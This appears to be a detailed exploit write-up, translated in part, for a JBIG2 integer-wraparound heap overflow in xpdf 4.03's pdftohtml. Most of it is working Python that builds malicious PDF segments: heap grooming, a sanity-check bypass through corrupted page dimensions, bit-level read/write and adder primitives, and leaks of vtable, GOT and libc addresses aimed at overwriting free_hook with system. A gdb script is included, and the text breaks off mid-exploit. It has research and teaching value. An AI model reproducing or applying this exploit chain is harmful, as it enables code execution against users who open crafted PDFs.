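What does that mean? Let's look at a few GList methods: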

GList::GList() {
  size = 8;
  data = (void **)gmallocn(size, sizeof(void*));
  length = 0;
  inc = 0;
}

void GList::append(void *p) {
  if (length >= size) {
    expand();
  }
  data[length++] = p;
}

void GList::expand() {
  size += (inc > 0) ? inc : size;
  data = (void **)greallocn(data, size, sizeof(void*));
}

The initial GList size is 8. When an append finds the list full, the capacity doubles. So the size starts at 8, becomes 16 after the first expansion, 32 after the second, and 64 after the third (the unit is pointers).
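
As a quick check of when each expansion happens, the growth rule can be simulated. This is a sketch that only mirrors the `inc == 0` path of `GList::append` and `GList::expand` shown above; `glist_growth` is a hypothetical helper name.

```python
def glist_growth(appends: int, initial: int = 8):
    """Simulate GList::append with inc == 0 (capacity doubles when full).

    Returns the final capacity and a list of
    (append_number, old_capacity, new_capacity) expansion events.
    """
    size, length = initial, 0
    events = []
    for n in range(1, appends + 1):
        if length >= size:          # same condition as GList::append
            events.append((n, size, size * 2))
            size *= 2               # size += size when inc == 0
        length += 1
    return size, events


size, events = glist_growth(33)
for n, old, new in events:
    # Each slot is one pointer, i.e. 8 bytes on a 64-bit target.
    print(f"append #{n}: {old} -> {new} slots ({old * 8:#x} -> {new * 8:#x} bytes)")
```

With 33 appends, the expansions happen on the 9th, 17th, and 33rd append, and each one frees the previous backing buffer (0x40, 0x80, then 0x100 bytes of user data).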

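The expansion uses realloc, so after the GList grows, the old chunk is freed. Because all the other small chunks were already allocated away above, the new chunk for each expansion must come from the top chunk. This guarantees that the new chunks are allocated in order from low addresses to high addresses.

We therefore make the global segment GList expand several times, from 8 up to the final size we need, 64:

In the code, glist_capacity == 32. My understanding is that this number marks the append count at which the global GList gets expanded to size 64.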

global_file = [
    SymbolDict(0, [Bitmap(1, 1)] * 0x10000),
    SymbolDict(1, [Bitmap(1, 1)] * (size_to_overflow // 8)),
    SymbolDict(2, [Bitmap(1, 1)]),
    # Heap grooming: eat every chunk in {tcache,fast,small,large,unsorted} bins
    [[DummyAlloc(size)] * 128 for size in range(0x10, 0x1000, 0x10)],
    [[DummyAlloc(size)] * 16 for size in range(0x1000, 0x10000, 0x100)],
    # ------------ heap feng shui starts here ------------
    [SymbolDict(i, []) for i in range(3, glist_capacity // 2)],
    # Now most bins are empty, except tcachebin 0x20, 0x50 and small bin 0x20
    # This triggers GList::expand(), 0x80 -> 0x100; allocates from top chunk
    SymbolDict(glist_capacity // 2, []),
    [SymbolDict(i, []) for i in range(glist_capacity // 2 + 1, glist_capacity)],
    # 0x100 -> 0x200, the old chunk should fall in tcache
    SymbolDict(100, []),
]

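After the heap feng shui in the global segment finishes, the heap layout is roughly as follows:

Note that for the Symbol Dicts with segNum 3 and above, the chunks allocated for their structures (chunk size = 0x40) also come directly from the top chunk.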

// low address --------------------------------------------
/*
    Other heap allocations, including
    1. the size=8 global GList backing store
    2. DummyAlloc
    3. SymbolDict0, 1, 2
    4. ...
*/
SymbolDict3-8;
heap hole left by the size=16 global GList backing store
SymbolDict9-16;
heap hole left by the size=32 global GList backing store
SymbolDict17-32;
size=64 global GList backing store // final location of the GList data; this one is not a hole
// high address -------------------------------------------

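Next, we only need to:

- let the pageBitmap backing store occupy the heap hole left by the size=16 GList
- let the syms pointer array created while parsing the TextRegion occupy the heap hole left by the size=32 GList

and the heap layout is complete.

The heap position of the pageBitmap JBIG2Bitmap structure itself is explained below.

Finally, here is a gdb script that helps with observing the memory layout: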

file ../../xpdf-4.03/build/xpdf/pdftohtml
aslr off
set follow-fork-mode parent

b readSymbolDictSeg if segNum==8
commands
    printf "sakura in read symbol 8\n"

    printf "globalSegments addr is:0x%llx\n", segments
    printf "segments GList backing buffer\n"
    p *(GList *)segments
    # tcachebins
    bins
    # c
end
b readSymbolDictSeg if segNum==16
commands
    printf "sakura in read symbol 16\n"

    printf "globalSegments addr is:0x%llx\n", segments
    printf "segments GList backing buffer\n"
    p *(GList *)segments
    # tcachebins
    bins
    # c
end
b readSymbolDictSeg if segNum==100
commands
    printf "sakura in read symbol 32\n"

    printf "globalSegments addr is:0x%llx\n", segments
    printf "segments GList backing buffer\n"
    p *(GList *)segments
    # tcachebins
    bins
    
    tb JBIG2Stream.cc:1481
    commands
        printf "after finish globalSegments addr is:0x%llx\n", segments
        p *(GList *)segments
        # tcachebins
        bins
    end
    # replace finish and print info
    # c
end

b JBIG2Stream.cc:2072 if segNum==102
commands
    printf "sakura in TextRegion to trigger oob\n"
    printf "numSyms after underoverflow is:0x%llx\n", numSyms
    set $oob_syms = $rax
    printf "undersized syms buffer addr is:0x%llx\n", $oob_syms

    printf "globalSegments addr is:0x%llx\n", globalSegments
    printf "segments GList backing buffer\n"
    p *(GList *)globalSegments

    printf "pageBitmap addr is :0x%llx\n", pageBitmap
    p *(JBIG2Bitmap *)pageBitmap
    bins

end

r sploit.pdf output

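b. Occupying the heap holes

The parsing done in the global stream creates the heap holes; the parsing done in the main stream occupies them.

Continuing from above, we now allocate a brand-new pageBitmap and let its backing store occupy the hole left by the size=16 GList:

In the code, GLIST_DATA_SIZE = 0x200, the number of bytes taken by the global GList data when size=64.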

page0 = [
    # Make sure page bitmap buffer uses the second-last globalSegments data buffer so
    # that it lies just before syms, at a fixed offset.
    # GLIST_DATA_SIZE // 4 bytes: fills the heap hole left by the size=16 GList
    PageInfo(101, w=8 * (GLIST_DATA_SIZE // 4), h=1),
]

The heap layout is now:

// low address --------------------------------------------
/*
    Other heap allocations, including
    1. the size=8 global GList backing store
    2. DummyAlloc
    3. SymbolDict0, 1, 2
    4. ...
*/
SymbolDict3-8;

// Note this one!
pageBitmap backing buffer // heap hole left by the size=16 global GList backing store

SymbolDict9-16;

heap hole left by the size=32 global GList backing store

SymbolDict17-32;

size=64 global GList backing store; // final location of the GList data; this one is not a hole

// Note this one!
pageBitmap JBIG2Bitmap structure

// high address -------------------------------------------

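A quick word on the chunk for the pageBitmap structure itself (JBIG2Bitmap): no free chunk in the bins can serve its size 0x20, so it is again allocated from the top chunk. Its address therefore lies above the size=64 GList, which is what the heap feng shui requires.

Next, parsing the TextRegion has to occupy the hole left by the size=32 GList. The user memory created in the TextRegion must therefore be syms_size = GLIST_DATA_SIZE // 2 bytes, which matches the size of that hole exactly.

Before going further, we need to bypass a rather amusing sanity check: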

// sanity check: if the w/h/x/y values are way out of range, it likely
// indicates a damaged JBIG2 stream
if (w / 10 > pageW || h / 10 > pageH ||
    x / 10 > pageW || y / 10 > pageH) {
    error(errSyntaxError, getPos(),
          "Bad size or position in JBIG2 text region segment");
    done = gTrue;
    return;
}

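This kind of sanity check appears many times in xpdf-4.03/xpdf/JBIG2Stream.cc. It tests whether the w/h/x/y being processed are far beyond the current pageW and pageH (two members of the JBIG2Stream class that hold the width and height of the current page). If they are, parsing has probably gone wrong, and the current segment is abandoned immediately.

The sanity check looks fine at first glance...

But let's go back and look at the code of readPageInfoSeg: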

void JBIG2Stream::readPageInfoSeg(Guint length)
{
    Guint xRes, yRes, flags, striping;
    // pageW and pageH are read directly from the untrusted stream
    if (!readULong(&pageW) || !readULong(&pageH) ||
        !readULong(&xRes) || !readULong(&yRes) ||
        !readUByte(&flags) || !readUWord(&striping))
    {
        goto eofError;
    }
    // if pageW and pageH are too large
    if (pageW == 0 || pageH == 0 || pageW > INT_MAX / pageW)
    {
        // simply stop parsing this pageInfoSeg
        error(errSyntaxError, getPos(), "Bad page size in JBIG2 stream");
        return;
    }
    [...]
}

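It is easy to see that even when readPageInfoSeg detects abnormal pageW and pageH values, it merely stops parsing the current segment and leaves the malformed pageW and pageH in the JBIG2Stream members.

So we can insert a PageInfoSeg with huge pageW and pageH, pollute these two fields with huge values, and bypass all of the newly added sanity checks that follow: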

page0 = [
    # Make sure page bitmap buffer uses the second-last globalSegments data buffer so
    # that it lies just before syms, at a fixed offset.
    PageInfo(101, w=8 * (GLIST_DATA_SIZE // 4), h=1),
    # Change pageH and pageW to a large value to bypass a (seriously funny) sanity
    # check introduced in Xpdf 4.03; Xpdf would report an error without allocating
    # a new pageBitmap, but won't stop parsing the JBIG2 stream, which is exactly what
    # we want.
    PageInfo(101, w=1919114514, h=1919114514),
]
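
The interaction between the two code paths can be sketched with a small model. It is a simplification under stated assumptions: `ToyStream` and its methods are hypothetical names, the validity test copies the condition exactly as quoted above, and only the two members that matter are tracked.

```python
INT_MAX = 2**31 - 1


class ToyStream:
    """Toy model of the pageW/pageH handling described above."""

    def __init__(self):
        self.pageW = 0
        self.pageH = 0
        self.page_bitmap_allocs = 0

    def read_page_info(self, w: int, h: int) -> bool:
        # The members are overwritten before any validation happens.
        self.pageW, self.pageH = w, h
        if w == 0 or h == 0 or w > INT_MAX // w:
            # Error path: return early, but keep the malformed values.
            return False
        self.page_bitmap_allocs += 1  # a new pageBitmap would be allocated here
        return True

    def region_passes_sanity_check(self, w: int, h: int, x: int, y: int) -> bool:
        return not (
            w // 10 > self.pageW
            or h // 10 > self.pageH
            or x // 10 > self.pageW
            or y // 10 > self.pageH
        )


stream = ToyStream()
ok_first = stream.read_page_info(8 * 0x80, 1)          # real page: allocates pageBitmap
blocked = stream.region_passes_sanity_check(1, 1, 0, 100)
ok_second = stream.read_page_info(1919114514, 1919114514)  # rejected, values kept
allowed = stream.region_passes_sanity_check(1, 1, 0, 100)
```

In this model the second PageInfo is rejected without allocating anything, yet a region that failed the check before it now passes.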

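With the sanity check bypassed, we can create the TextRegionSeg that performs the heap overflow. As discussed above, this TextRegionSeg has to meet the following requirements:

- The syms array it creates must be syms_size bytes (this value was explained above).
- The amount of data written into the chunk is size_to_overflow bytes, that is, size_to_overflow // 8 pointers are actually written.

So in the main stream we need to combine the sizes of the Symbol Dicts referenced by the TextRegion appropriately: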

# Trigger the out-of-bound write.
TextRegion(
    102,
    w=1,
    h=1,
    x=0,
    y=0,
    # size_to_overflow // 8 pointers
    ref_segs=[1]
    # 0x10000 + (syms_size - size_to_overflow) // 8 pointers
    + [2] * (0x10000 + (syms_size - size_to_overflow) // 8)
    # 0xffff0000 pointers in total
    + [0] * 0xFFFF,
),

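For the combination in the code above,

$$\frac{\text{size\_to\_overflow}}{8} + \left(\text{0x10000} + \frac{\text{syms\_size} - \text{size\_to\_overflow}}{8}\right) + \text{0xffff0000} = \text{0x100000000} + \frac{\text{syms\_size}}{8}$$

The 32-bit numSyms wraps around to syms_size / 8, so exactly syms_size bytes are allocated.

The Symbol Dict referenced first holds size_to_overflow // 8 pointers. So when readTextRegionSeg copies the instances of the first referenced Symbol Dict, it writes exactly size_to_overflow bytes into the syms chunk, overflowing all the way into the header of the pageBitmap JBIG2Bitmap structure. This achieves the overflow.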
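
The arithmetic can be checked directly. This is a sketch under assumptions: numSyms is treated as a 32-bit unsigned counter, `size_to_overflow = 0x638` is only an illustrative value (the real one comes from the heap layout), and `dict_sizes` simply restates the three global SymbolDict sizes.

```python
GLIST_DATA_SIZE = 0x200
syms_size = GLIST_DATA_SIZE // 2
size_to_overflow = 0x638  # illustrative value only; must be a multiple of 8

# Number of bitmaps (pointers) in each global SymbolDict, keyed by segNum.
dict_sizes = {0: 0x10000, 1: size_to_overflow // 8, 2: 1}

# Same reference list as the TextRegion above.
ref_segs = (
    [1]
    + [2] * (0x10000 + (syms_size - size_to_overflow) // 8)
    + [0] * 0xFFFF
)

total_pointers = sum(dict_sizes[seg] for seg in ref_segs)
num_syms_32 = total_pointers & 0xFFFFFFFF   # what a 32-bit counter would hold
allocated_bytes = num_syms_32 * 8           # size of the syms pointer array
written_first = dict_sizes[ref_segs[0]] * 8  # bytes copied from the first dict

print(hex(total_pointers), hex(num_syms_32), hex(allocated_bytes), hex(written_first))
```

The true pointer count exceeds 2^32, the wrapped count yields a syms_size-byte buffer, and the first referenced dictionary alone already writes size_to_overflow bytes into it.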

Here is how size_to_overflow is derived. First, the heap layout:

// low address --------------------------------------------
/*
    Other heap allocations, including
    1. the size=8 global GList backing store
    2. DummyAlloc
    3. SymbolDict0, 1, 2
    4. ...
*/
SymbolDict3-8;
pageBitmap backing buffer // heap hole left by the size=16 global GList backing store
SymbolDict9-16;

// data is written starting from here
syms // the size of syms is syms_size
SymbolDict17-32; // 16 SymbolDicts; one SymbolDict is 0x40 bytes
size=64 global GList backing store; // the GList data size here is GLIST_DATA_SIZE
pageBitmap JBIG2Bitmap structure  // vtbl + segNum + w + h + line also need to be overwritten, 24 bytes in total

// high address -------------------------------------------

From the heap layout we get:

size_to_overflow = (
    ptmalloc_chunk_size(syms_size)
    # 40: sizeof(JBIG2SymbolDict); there are (glist_capacity // 2) irrelevant JBIG2SymbolDict-s
    + ptmalloc_chunk_size(40) * (glist_capacity // 2)
    + ptmalloc_chunk_size(GLIST_DATA_SIZE)
    # Current page JBIG2Bitmap
    # vtbl(8)
    + 8
    # segNum(4), w(4), h(4), line(4)
    + 4 * 4
)
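
The helper `ptmalloc_chunk_size` is used above without being shown. A minimal sketch of what such a helper might look like, assuming 64-bit glibc defaults (8-byte size field, 16-byte alignment, 32-byte minimum chunk); the exploit's own definition may differ:

```python
def ptmalloc_chunk_size(request: int) -> int:
    """Chunk size glibc malloc would use for a request of `request` bytes.

    Assumes x86-64 glibc defaults: SIZE_SZ = 8, MALLOC_ALIGNMENT = 16,
    MINSIZE = 32. These are assumptions, not values taken from the exploit.
    """
    size_sz = 8
    align = 16
    min_chunk = 32
    size = (request + size_sz + align - 1) & ~(align - 1)
    return max(size, min_chunk)


GLIST_DATA_SIZE = 0x200
for request in (GLIST_DATA_SIZE // 4, GLIST_DATA_SIZE // 2, GLIST_DATA_SIZE):
    print(hex(request), "->", hex(ptmalloc_chunk_size(request)))
```

Under these assumptions each GList backing buffer costs 0x10 bytes more than its user size, which is why the offsets are computed from chunk sizes rather than from the raw request sizes.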

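Afterwards, we allocate back the syms_size chunk that readTextRegionSeg has just freed, to prevent possible crashes later in the exploit.

# Take back the free-d syms, hold it to prevent potential crash.
GenericRegion(103, imm=False, bitmap=Bitmap(8, syms_size)),

What gets written out of bounds into the header of the pageBitmap JBIG2Bitmap structure is pointer values, so the range we can read and write out of bounds is limited. We therefore use this limited pageBitmap out-of-bounds primitive to modify pageBitmap's own JBIG2Bitmap header, enlarging its w/h/line to extend the reachable range. From the heap layout above we can likewise derive the distance from page_bitmap_buf to the pageBitmap JBIG2Bitmap: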

page_bitmap_buf_to_class_offset = (
    ptmalloc_chunk_size(GLIST_DATA_SIZE // 4)
    + ptmalloc_chunk_size(40) * (glist_capacity // 4)
    + size_to_overflow
    - 4 * 4
    - 8
)

Then w/h/line are changed to $w=2^{27}$, $h=2^{24}$, and $line=2^{24}$ respectively:

imm set to true means immediate rendering, i.e. the specified position of pageBitmap is modified right away.

# Overwrite pageBitmap->w, h and line
GenericRegion(
    104,
    x=(page_bitmap_buf_to_class_offset + 12) * 8,
    y=0,
    comb_op=CombOp.Replace,
    # (x, y) -> mem[(y << 24) | (x >> 3)] >> (7 - (x & 7)), max 48-bit addressing
    bitmap=Bitmap(struct.pack("<III", 2 ** 27, 2 ** 24, 2 ** 24)),
    imm=True,
),

The two-dimensional space of the modified pageBitmap:

+------------------> w=2^27 bit
|
|
|
|
|
|
V h=2^24 bit

Finally, we create a SymbolDict with 16 Bitmaps for use in the steps that follow:

# 16 "variables". Since we can only do bitwise operations relative to page bitmap
# with Refinement regions, we need these variables for peeking other absolute
# addresses, and also rebase the page bitmap in one segment command.
SymbolDict(105, [Bitmap(64, 1)] * 16)

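This SymbolDict will be used by the address dereference primitive, described in detail below.

That is the overall heap feng shui layout. Once the heap overflow is done, pageBitmap can read and write at large offsets, so the next step is to build primitives on top of it.

2. Bitwise primitives

Remember the GenericRefinementRegionSeg introduced earlier (scroll up if not)? We now use the behavior of this seg to build a bitwise operator that works on arbitrary bits.

The bitwise operator implemented in the exploit looks like this: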

class BitSeg:
    _seq = itertools.count(10000)

    def __init__(self, seg_num):
        self.seg_num = seg_num
        self.__consumed = False

    def consume(self):
        assert not self.__consumed
        self.__consumed = True
        return self.seg_num

    @classmethod
    def from_page(cls, offset):
        x, y = offset % 2 ** 27, offset // 2 ** 27
        idx = next(cls._seq)
        page0.append(ReadoutRefinement(idx, x=x, y=y, imm=False))
        return cls(idx)

class CombOp(enum.IntEnum):
    Or = 0
    And = 1
    Xor = 2
    Xnor = 3
    Replace = 4
    
def bitop(oa, ob, op: CombOp):
    b = BitSeg.from_page(ob)
    x, y = oa % 2 ** 27, oa // 2 ** 27
    page0.append(
        ReadoutRefinement(65536, x=x, y=y, imm=True, ref=b.consume(), comb_op=op)
    )

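The oa and ob parameters of the bitop primitive are in bits, and op has 5 possible values.

bitop first maps the one-dimensional offsets oa and ob to two-dimensional bitmap offsets xy1 and xy2. Then, while parsing the RefinementRegionSeg for ob, it takes the data at xy2 out of pageBitmap and stores it in segments.

Why is 2^27 used as the divisor/modulus when mapping a one-dimensional offset to a two-dimensional one? Because that is the width we set above.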
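
The mapping can be written out explicitly. A small sketch, assuming the patched values w = 2^27 bits and line = 2^24 bytes and the MSB-first bit addressing given in the exploit's own comment (`mem[(y << 24) | (x >> 3)] >> (7 - (x & 7))`); the function names are hypothetical:

```python
PAGE_W_BITS = 2 ** 27     # patched pageBitmap->w, in bits
PAGE_LINE_BYTES = 2 ** 24  # patched pageBitmap->line, in bytes


def bit_offset_to_xy(offset: int):
    """Map a flat bit offset from pageBitmap->data to (x, y)."""
    return offset % PAGE_W_BITS, offset // PAGE_W_BITS


def xy_to_bit_offset(x: int, y: int) -> int:
    """Inverse of bit_offset_to_xy."""
    return y * PAGE_W_BITS + x


def xy_to_byte_and_shift(x: int, y: int):
    """Byte index and right-shift that select pixel (x, y), MSB first."""
    return y * PAGE_LINE_BYTES + (x >> 3), 7 - (x & 7)


x, y = bit_offset_to_xy(2 ** 27 + 5)
byte_index, shift = xy_to_byte_and_shift(x, y)
```

Because w / 8 equals line, consecutive rows are contiguous in memory, so the flat bit offset and the (x, y) pair address the same bit.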

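Next, when hso parses the RefinementRegionSeg for oa, it reads back the RefinementRegion stored earlier for ob and combines it with position xy1 of pageBitmap, which gives us a bitwise operation between any two chosen bits of pageBitmap.

Note that findSegment works by walking the segments list in order and comparing segNum. Every RefinementRegion added to segments must therefore use a segNum different from all segments appended before it!

With the bitwise primitive bitop available, the other primitives can be built on top of it: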

bitwise_mov = lambda a, b: bitop(a, b, CombOp.Replace)
bitwise_xor = lambda a, b: bitop(a, b, CombOp.Xor)
bitwise_and = lambda a, b: bitop(a, b, CombOp.And)
bitwise_or = lambda a, b: bitop(a, b, CombOp.Or)


def op_q_q(oa, ob, op: CombOp):
    for i in range(64):
        bitop(oa * 8 + i, ob * 8 + i, op)


# Offsets are in bytes.
mov_q_q = lambda a, b: op_q_q(a, b, CombOp.Replace)
xor_q_q = lambda a, b: op_q_q(a, b, CombOp.Xor)
and_q_q = lambda a, b: op_q_q(a, b, CombOp.And)
or_q_q = lambda a, b: op_q_q(a, b, CombOp.Or)

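The oa and ob parameters of the op_q_q primitive are in bytes (note that this differs from bitop).

The purpose of op_q_q is to perform one 8-byte bitwise operation between the two positions given by the relative one-dimensional byte offsets oa and ob.

For example, the primitive and_q_q(0, 8) does the following:

- It takes the eight bytes at byte offset 0 (bytes 0-7) and the eight bytes at byte offset 8 (bytes 8-15), and ANDs them bit by bit.
- It stores the result in the eight bytes at byte offset 0 (bytes 0-7).

The primitive is easy to understand; it is just awkward to describe in words.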
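
The same example can be run against a plain bytearray. This is only a model of the semantics: `get_bit`, `set_bit`, and this `and_q_q` are hypothetical stand-ins that operate on local memory instead of emitting JBIG2 segments.

```python
def get_bit(mem: bytearray, bit_off: int) -> int:
    """Read one bit, MSB first within each byte."""
    return (mem[bit_off >> 3] >> (7 - (bit_off & 7))) & 1


def set_bit(mem: bytearray, bit_off: int, value: int) -> None:
    """Write one bit, MSB first within each byte."""
    mask = 1 << (7 - (bit_off & 7))
    if value:
        mem[bit_off >> 3] |= mask
    else:
        mem[bit_off >> 3] &= ~mask & 0xFF


def and_q_q(mem: bytearray, oa: int, ob: int) -> None:
    """mem[oa:oa+8] &= mem[ob:ob+8], one bit at a time (offsets in bytes)."""
    for i in range(64):
        a_bit, b_bit = oa * 8 + i, ob * 8 + i
        set_bit(mem, a_bit, get_bit(mem, a_bit) & get_bit(mem, b_bit))


mem = bytearray(bytes.fromhex("ff00ff00ff00ff00" "0f0f0f0f0f0f0f0f"))
and_q_q(mem, 0, 8)
print(mem.hex())
```

Bytes 0-7 now hold the AND of the two operands, and bytes 8-15 are untouched. In the real exploit each of the 64 iterations costs two refinement segments.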

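Next, the bitwise operations are used to build an 8-byte full adder. You may want to read this article first and then look at the code: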

# Don't worry, Libra won't hu^W^W^W Xpdf allocates 1 more byte
adder_buf_offset = GLIST_DATA_SIZE // 4 * 8 # 1024

def add_q_q(oa, ob):
    oa, ob = oa * 8, ob * 8
    ab_xor, ab_and, carry, ab_xor_c_and, zero = range(
        adder_buf_offset, adder_buf_offset + 5
    )
    # initially, the carry into the lowest full adder is 0
    bitwise_mov(carry, zero)
    # 8 bytes = 64 bits, hence range(64)
    for i in range(64):
        # one full adder per **bit**; a full adder is built from two half adders
        a_bit_offset = oa + i // 8 * 8 + (7 - i % 8)
        b_bit_offset = ob + i // 8 * 8 + (7 - i % 8)
        # This is a naive full-adder. Applying TIS-100 skill could cut 3~4 ops maybe.
        # first half adder
        bitwise_mov(ab_xor, a_bit_offset)
        bitwise_xor(ab_xor, b_bit_offset)
        bitwise_mov(ab_and, a_bit_offset)
        bitwise_and(ab_and, b_bit_offset)
        # second half adder
        bitwise_mov(a_bit_offset, ab_xor)
        bitwise_xor(a_bit_offset, carry)  # output (S)
        bitwise_mov(ab_xor_c_and, ab_xor)
        bitwise_and(ab_xor_c_and, carry)
        # set the carry flag
        bitwise_mov(carry, ab_and)
        bitwise_or(carry, ab_xor_c_and)
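
To convince yourself that the bit ordering is right, the adder can be replayed on a local buffer. A sketch under assumptions: the scratch cells (ab_xor, ab_and, carry) are plain Python variables here rather than bits in the page bitmap, memory is a bytearray, and values are little-endian 64-bit integers.

```python
import struct


def get_bit(mem: bytearray, bit_off: int) -> int:
    return (mem[bit_off >> 3] >> (7 - (bit_off & 7))) & 1


def set_bit(mem: bytearray, bit_off: int, value: int) -> None:
    mask = 1 << (7 - (bit_off & 7))
    if value:
        mem[bit_off >> 3] |= mask
    else:
        mem[bit_off >> 3] &= ~mask & 0xFF


def add_q_q(mem: bytearray, oa: int, ob: int) -> None:
    """mem[oa:oa+8] += mem[ob:ob+8] (mod 2**64) using only bit operations."""
    oa, ob = oa * 8, ob * 8
    carry = 0
    for i in range(64):
        # Bit i of a little-endian qword: byte i // 8, and within that byte
        # the (7 - i % 8)-th position when bits are numbered MSB first.
        a_off = oa + i // 8 * 8 + (7 - i % 8)
        b_off = ob + i // 8 * 8 + (7 - i % 8)
        a, b = get_bit(mem, a_off), get_bit(mem, b_off)
        ab_xor = a ^ b                       # first half adder: sum
        ab_and = a & b                       # first half adder: carry
        set_bit(mem, a_off, ab_xor ^ carry)  # second half adder: output S
        carry = ab_and | (ab_xor & carry)    # carry out


a = 0x00007FFFF7A0D123
b = (-0x123) % 2 ** 64
mem = bytearray(struct.pack("<QQ", a, b))
add_q_q(mem, 0, 8)
result = struct.unpack_from("<Q", mem, 0)[0]
print(hex(result))
```

Adding the two's-complement encoding of a negative offset behaves like subtraction, which is how the later steps move from a leaked address to a base address.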

The structure of the full adder is shown below:

3. 立即数运算原语

Besides the bitwise primitives above, there are also primitives that load an external immediate value and operate with it.

def op_q_imm(offset, imm, op):
    offset *= 8
    x, y = offset % 2 ** 27, offset // 2 ** 27
    page0.append(
        GenericRegion(
            233, x=x, y=y, comb_op=op, bitmap=Bitmap(struct.pack("<Q", imm)), imm=True
        )
    )


mov_q_imm = lambda o, imm: op_q_imm(o, imm, CombOp.Replace)
xor_q_imm = lambda o, imm: op_q_imm(o, imm, CombOp.Xor)
and_q_imm = lambda o, imm: op_q_imm(o, imm, CombOp.And)
or_q_imm = lambda o, imm: op_q_imm(o, imm, CombOp.Or)

readGenericRegionSeg reads a bitmap from the external JBIG2Stream and combines it with a specific position of pageBitmap, so GenericRegionSeg can serve as the immediate-value primitive here.

4. 地址解引用原语

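Once we know the absolute address where some pointer is stored, how do we read the pointer out of that address? This requires an address dereference operation. The exploit provides two primitives for it:

rebase_variable_q: copies the 8 bytes at one-dimensional offset addr_page_offset in pageBitmap into the data field of the idx-th JBIG2Bitmap in the 16-Bitmap SymbolDict created in the last heap feng shui step:
Note that the value directly overwrites the data field of the JBIG2Bitmap; it is not written to the memory that the data pointer refers to.

def rebase_variable_q(idx, addr_page_offset):
    mov_q_q(
        variable_bitmap_offset + idx * ptmalloc_chunk_size(0x20) + 0x18,
        addr_page_offset,
    )

load_variable: reads the first 8 bytes of the backing store of the idx-th JBIG2Bitmap in that last Symbol Dict (that is, the memory obtained by dereferencing its data pointer) into the 8 bytes at one-dimensional offset to_page_offset in pageBitmap.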

def load_variable(to_page_offset, idx):
    to_page_offset *= 8
    x, y = to_page_offset % 2 ** 27, to_page_offset // 2 ** 27
    page0.append(
        TextRegion(
            233,
            x=x,
            y=y,
            w=64,
            h=1,
            imm=True,
            instances=[idx],
            ref_symbol_cnt=16,
            ref_segs=[105],
        )
    )

Combining these two primitives gives us address dereferencing.
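
How the pair works together can be shown with a toy memory model. Everything here is hypothetical scaffolding: `memory` maps absolute addresses to qwords, `page` maps page byte offsets to qwords, `variables` holds the data pointer of each of the 16 variable bitmaps, and the addresses are made-up values.

```python
# Hypothetical process memory: absolute address -> 8-byte value.
memory = {0x601018: 0x7FFFF7A91950}

# Hypothetical page bitmap contents: byte offset -> 8-byte value.
page = {}

# data pointer of each of the 16 "variable" bitmaps in the SymbolDict.
variables = [0] * 16


def rebase_variable_q(idx: int, addr_page_offset: int) -> None:
    """Overwrite variable idx's data pointer with the qword stored in the page."""
    variables[idx] = page[addr_page_offset]


def load_variable(to_page_offset: int, idx: int) -> None:
    """Copy the qword that variable idx's data pointer refers to into the page."""
    page[to_page_offset] = memory[variables[idx]]


page[0] = 0x601018        # an absolute address we computed earlier
rebase_variable_q(0, 0)   # variable 0 now points at that address
load_variable(8, 0)       # page[+8] = *(uint64_t *)0x601018
```

After the two calls, offset +8 of the page holds the value stored at the absolute address that was sitting at offset +0, which is a dereference.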

5. 整体利用流程

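With all the primitives ready, the next step is to combine them to overwrite free_hook with the address of libc_system.

First we need to leak an address (and obviously not a heap address). Looking at the heap layout: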

// low address .....
...
SymbolDict3-8;
pageBitmap backing buffer // heap hole left by the size=16 global GList backing store
SymbolDict9-16;
...
// high address .....

A SymbolDict sits right next to the pageBitmap buffer, so we can read its vtable pointer.

# vtbl of a JBIG2SymbolDict adjacent to page bitmap buffer
# copy the vtbl address to +0
mov_q_q(0, ptmalloc_chunk_size(GLIST_DATA_SIZE // 4))

Then we read a relative offset from outside into pageBitmap data + 8:

# compute -vtbl_offset + free_got_offset
mov_q_imm(
    8, (-PDFTOHTML_VTBL_JBIG2SYMBOLDICT_OFFSET + PDFTOHTML_FREE_GOT_OFFSET) % 2 ** 64
)

A simple addition then yields the absolute address of the free entry in the GOT, stored at +0:

# vtbl address + (-vtbl_offset + free_got_offset) = address of free_got, stored at +0
add_q_q(0, 8)
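
The reason for the `% 2 ** 64` is that the adder only works on unsigned 64-bit values, so a possibly negative delta is passed in two's-complement form. A short sketch with made-up numbers: `VTBL_OFFSET`, `FREE_GOT_OFFSET`, and `image_base` are hypothetical placeholders, not the real constants of the target binary.

```python
MASK64 = 2 ** 64 - 1


def add64(a: int, b: int) -> int:
    """64-bit wrapping addition, the operation add_q_q performs."""
    return (a + b) & MASK64


# Hypothetical offsets inside the binary image (placeholders only).
VTBL_OFFSET = 0x1B2C30
FREE_GOT_OFFSET = 0x1A0F18       # lower than VTBL_OFFSET, so the delta is negative
image_base = 0x555555554000      # unknown to the attacker at exploit-writing time

leaked_vtbl = image_base + VTBL_OFFSET                 # value copied to +0
delta = (-VTBL_OFFSET + FREE_GOT_OFFSET) % 2 ** 64     # immediate stored at +8
free_got = add64(leaked_vtbl, delta)                   # add_q_q(0, 8)

print(hex(delta), hex(free_got))
```

The result equals image_base + FREE_GOT_OFFSET even though image_base never appears in the immediate, so the same file works regardless of where the binary is loaded.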

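Next, we dereference this free.got address to obtain the address of free in libc:

# take the free_got address from +0 and put it in the data pointer of "variable" 0
rebase_variable_q(0, 0)
# read the value behind "variable" 0 (now the absolute address of libc.free) into +8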
load_variable(8, 0)  # address of libc.free at +8

With the address of free in libc in hand, we read in relative offsets and add them. A few simple steps give us the absolute addresses of free_hook and libc_system:

# put the immediate -LIBC_FREE_OFFSET (mod 2**64) at +0
mov_q_imm(0, -LIBC_FREE_OFFSET % 2 ** 64)
# libc.free address + (-LIBC_FREE_OFFSET) = libc base, stored at +8
add_q_q(8, 0)
# copy the libc base from +8 to +0
mov_q_q(0, 8)
# put the immediate LIBC_FREE_HOOK_OFFSET at +16
mov_q_imm(16, LIBC_FREE_HOOK_OFFSET)
# libc base + LIBC_FREE_HOOK_OFFSET = absolute address of free_hook, stored at +0
add_q_q(0, 16)
# put the immediate LIBC_SYSTEM_OFFSET at +16
mov_q_imm(16, LIBC_SYSTEM_OFFSET)
# compute the absolute address of system, stored at +8
add_q_q(8, 16)

At this point the data at pageBitmap->data is:

+0: free_hook_address
+8: libc_system_address

Next we compute the address pageBitmap->data + 8, that is, the memory address where this libc_system_address value is stored:

# copy pageBitmap's data pointer to +24
mov_q_q(24, page_bitmap_buf_to_data_ptr)
# put the immediate 8 at +16
mov_q_imm(16, 8)
# add 8 to the data pointer and store the result at +24
add_q_q(24, 16)

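What is this address for? Read on; the main event is coming:

# put the value of pageBitmap's data pointer into the data field of variable 0
rebase_variable_q(0, page_bitmap_buf_to_data_ptr)
# put the value (data pointer + 8) into the data field of variable 1
rebase_variable_q(1, 24)
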